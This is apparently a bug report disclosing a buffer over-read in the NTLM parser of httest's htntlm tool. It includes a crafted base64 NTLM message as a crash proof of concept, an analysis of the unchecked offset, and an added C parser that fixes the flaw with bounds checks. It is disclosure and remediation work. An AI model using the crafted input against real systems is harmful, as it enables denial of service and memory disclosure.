
#6 Buffer-Over-Read in /src/htntlm.c (version<=2.4.24)

2.0
open
nobody
Bugs (2)
2019-09-06
2019-09-06
Kirin
No

There is a buffer over-read when the program reads an NTLM message (type 1, 2, 3) (version <= 2.4.24)

POC:

 ./htntlm -r  TlRMTVNTUAABAAAAAAAAAAUABQD///+PBQAFACUAAABLSVJJTktJUklO

Output:

Segmentation Fault

Analyze

It will crash at:

hook->domain = apr_pstrndup(hook->pool, (char *)&msg[offset], len);

When the program reads an NTLM message (type 1, 2, 3), the offset is taken from the message without a check:

 offset = ntlm_ntoh32(*((uint32_t *)&msg[20]));

So an attacker can control the offset to read data at an arbitrary address.
This leads to denial of service and information disclosure.
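The following is an added example, not code from httest or from the reporter. It shows the bounds check the report says is missing: a Type 1 parser that reads each NTLM security buffer (uint16 len, uint16 maxlen, uint32 offset) and refuses to copy unless offset and offset+len both lie inside the received message. The 42-byte message is the report's base64 PoC decoded; its domain offset is 0x8fffffff, which is what makes the unchecked `&msg[offset]` read fault. The field positions (domain descriptor at 16, workstation descriptor at 24) are assumed from the standard Type 1 layout and the `msg[20]` read quoted above; plain `malloc` stands in for `apr_pstrndup`, and the function names are this example's own.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* NTLM fields are little-endian on the wire; these play the role of ntlm_ntoh32 in the report. */
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* An NTLM "security buffer" descriptor: uint16 len, uint16 maxlen, uint32 offset. */
#define NTLM_SECBUF_SIZE 8

/* Assumed Type 1 layout: 0..7 "NTLMSSP\0", 8..11 type, 12..15 flags,
 * 16..23 domain descriptor, 24..31 workstation descriptor. */
#define NTLM_T1_DOMAIN_POS      16
#define NTLM_T1_WORKSTATION_POS 24

/* Bounds-checked stand-in for the report's apr_pstrndup(pool, &msg[offset], len).
 * Returns a NUL-terminated copy of the referenced bytes, or NULL with *err set when the
 * descriptor is truncated or points outside the message. */
static char *ntlm_secbuf_dup(const unsigned char *msg, size_t msg_len, size_t field_pos,
                             const char **err)
{
    if (field_pos > msg_len || NTLM_SECBUF_SIZE > msg_len - field_pos) {
        *err = "security buffer descriptor truncated";
        return NULL;
    }
    uint16_t len = rd16(&msg[field_pos]);
    uint32_t offset = rd32(&msg[field_pos + 4]);

    /* The check the vulnerable code lacks: offset and offset+len must lie inside msg.
     * Written as a subtraction so a huge offset cannot wrap an addition. */
    if (offset > msg_len || (size_t)len > msg_len - offset) {
        *err = "security buffer points outside the message";
        return NULL;
    }
    char *out = malloc((size_t)len + 1);
    if (out == NULL) {
        *err = "out of memory";
        return NULL;
    }
    memcpy(out, &msg[offset], len);
    out[len] = '\0';
    *err = NULL;
    return out;
}

/* Parse a Type 1 message into its domain and workstation strings (caller frees both).
 * Returns false, with *err describing the problem, on any malformed input. */
bool ntlm_type1_parse(const unsigned char *msg, size_t msg_len,
                      char **domain, char **workstation, const char **err)
{
    *domain = *workstation = NULL;
    if (msg_len < NTLM_T1_WORKSTATION_POS + NTLM_SECBUF_SIZE ||
        memcmp(msg, "NTLMSSP", 8) != 0 || rd32(&msg[8]) != 1) {
        *err = "not an NTLM Type 1 message";
        return false;
    }
    *domain = ntlm_secbuf_dup(msg, msg_len, NTLM_T1_DOMAIN_POS, err);
    if (*domain == NULL)
        return false;
    *workstation = ntlm_secbuf_dup(msg, msg_len, NTLM_T1_WORKSTATION_POS, err);
    if (*workstation == NULL) {
        free(*domain);
        *domain = NULL;
        return false;
    }
    return true;
}

/* The report's PoC, base64-decoded: domain descriptor len=5, offset=0x8fffffff (far outside
 * this 42-byte message); workstation descriptor len=5, offset=37 (the second "KIRIN"). */
const unsigned char NTLM_POC_MSG[42] = {
    'N','T','L','M','S','S','P',0,  0x01,0,0,0,  0,0,0,0,
    0x05,0x00,0x05,0x00,  0xff,0xff,0xff,0x8f,
    0x05,0x00,0x05,0x00,  0x25,0x00,0x00,0x00,
    'K','I','R','I','N','K','I','R','I','N'
};
const size_t NTLM_POC_LEN = sizeof NTLM_POC_MSG;

/* Constructed well-formed variant: same bytes with the domain offset set to 32 (the first "KIRIN"). */
void ntlm_make_benign(unsigned char out[42])
{
    memcpy(out, NTLM_POC_MSG, 42);
    out[20] = 0x20; out[21] = 0; out[22] = 0; out[23] = 0;
}
```

Feeding `NTLM_POC_MSG` to `ntlm_type1_parse` returns false with "security buffer points outside the message" instead of touching memory at `msg + 0x8fffffff`; the corrected copy from `ntlm_make_benign` parses to domain "KIRIN" and workstation "KIRIN". The same check applies to every security buffer in Type 2 and Type 3 messages, which the report says share the flaw.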
